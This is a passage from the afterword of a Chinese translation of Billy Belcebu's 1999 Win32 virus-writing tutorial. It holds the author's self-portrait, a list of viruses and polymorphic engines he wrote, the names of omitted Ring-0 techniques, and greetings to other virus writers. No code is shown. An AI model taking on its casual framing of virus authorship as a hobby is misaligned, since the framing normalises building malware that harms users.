嗨:)我把这一节给了我自己。你可以说我自私,自大,或者hipocrite(【译者注】没见过这个词)。我知道我并不是这样的:)我只是想让你知道在这篇教程里试着教给你东西的人。我(仍然)是一个16岁的西班牙人。而且我有自己的世界观,我有自己的政治主见,我有信念,我想我们可以做些事情来拯救当今的病态的社会。我不愿生活在生活中充斥着钱的地方(任何生活形式,如,人类,动物,蔬菜...),民主被政府的人曲解了(这不仅仅是西班牙的问题,在许多大国也存在,如USA,UK,Frace,等等)。民主(我想共产主义会更好,但是如果没有比民主更好的东西...)必需使得国家的居民能够选择他们的未来。哎,我厌倦在我快要发布的东西里写这个了。看起来象在谈论一堵墙:)
OK,ok,我将谈一点我的作品。我是如下病毒(直到现在)的编写者:
+ 在DDT时,
- Antichrist Superstar [ Never released to the public ]
- Win9x.Garaipena [ AVP: Win95.Gara ]
- Win9x.Iced Earth [ AVP: Win95.Iced.1617 ]
+ 在iKX时,
- Win32.Aztec v1.00, v1.01 [ AVP: Win95.Iced.1412 ]
- Win32.Paradise v1.00 [ AVP: Win95.Iced.2112 ]
- Win9x.PoshKiller v1.00
- Win32.Thorin v1.00
- Win32.Legacy v1.00
- Win9x.Molly
- Win32.Rhapsody
还有, 从下面的变异引擎:
- LSCE v1.00 [Little Shitty Compression Engine]
- THME v1.00 [The Hobbit Mutation Engine]
- MMXE v1.00, v1.01 [MultiMedia eXtensions Engine]
- PHIRE v1.00 [Polymorphic Header Idiot Random Engine]
- iENC v1.00 [Internal ENCryptor]
而且我已经写了不少教程了,但是我不在这里列举了:)
现在,我是iKX组织的一个成员。正如你知道的,iKX代表International Knowledge eXchange。在过去,我是DDT的建立者。我称自己是反法西斯主义者,人类权利的保护者,反战主义者,而且对那些虐待妇女和儿童的家伙非常痛恨。我只是对自己有信心,我没有任何宗教信仰。
对我来说另外一件重要的事情(除了朋友)是音乐。在写这些东西的时候,我一直在听着音乐:)
想要更多的知道我和我的作品,看看我的主页。
【结束语】
~~~~~~~~~~
好了,另外一篇教程到它的结尾了...在某些方面它有点罗嗦(嗨,我是人,我更愿意编码而不是写作),但是在我的脑海中总是在希望一些人在读它的时候有一些想法。正如我在介绍里所说的,这里我所列出来的几乎所有代码都是我自己写的(不象我的DOS VWGs)。我希望它对你有帮助。
我知道我没有涉及一些东西,如加一个新节的隐藏方法,或者"调用门"技术或者"VMM 插入"以进入Ring-0。我只是努力使这篇教程简单。现在你必须判断这是否是一个正确的选择。时间将会证明一切。
这篇文档献给那些从我迈出Win32编码第一步起帮助过我的人:zAxOn, Super, nIgr0, Vecna, b0z0, Ypsilon, MDriller, Qozah,Benny, Jacky Qwerty(不知不觉的帮助,无论如何...),Lord Julus(是的,我也是从他的教程学的!), StarZer0,和许多其他人。当然了,还需要问候的人是are Int13h, Owl, VirusBuster, Wintermute, Somniun,SeptiC, TechnoPhunk, SlageHammer,还有,毫无疑问,我热爱的读者。这是为你们写的!
- Mejor morir de pie que vivir arrodillado - (Ernesto "Che" Guevara)
Valencia, 6 of September, 1999.
(c) 1999 Billy Belcebu/iKX作者: 路人辰 时间: 2006-4-11 18:42 标题: [转帖]Billy Belceb病毒编写教程---Win32篇